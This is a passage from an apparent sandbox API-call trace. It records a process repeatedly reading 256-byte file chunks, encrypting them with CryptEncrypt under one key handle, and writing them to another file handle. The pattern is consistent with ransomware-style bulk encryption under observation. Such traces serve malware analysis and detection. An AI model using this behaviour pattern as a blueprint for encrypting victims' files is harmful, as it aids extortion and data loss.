lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.488] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.488] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.488] GetLastError () returned 0x0 [0148.488] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.489] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.489] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.489] GetLastError () returned 0x0 [0148.489] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.490] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.490] GetLastError () returned 0x0 [0148.490] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.490] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.491] GetLastError () returned 0x0 [0148.491] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.491] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.491] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.492] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.492] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.492] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.492] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.492] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.492] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.492] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.492] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.492] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.492] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.492] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.492] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.493] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.493] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.493] GetLastError () returned 0x0 [0148.493] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.494] CryptEncrypt (in: hKey=0x9ad238, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.494] GetLastError () returned 0x0 [0148.494] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.494] ReadFile (in: 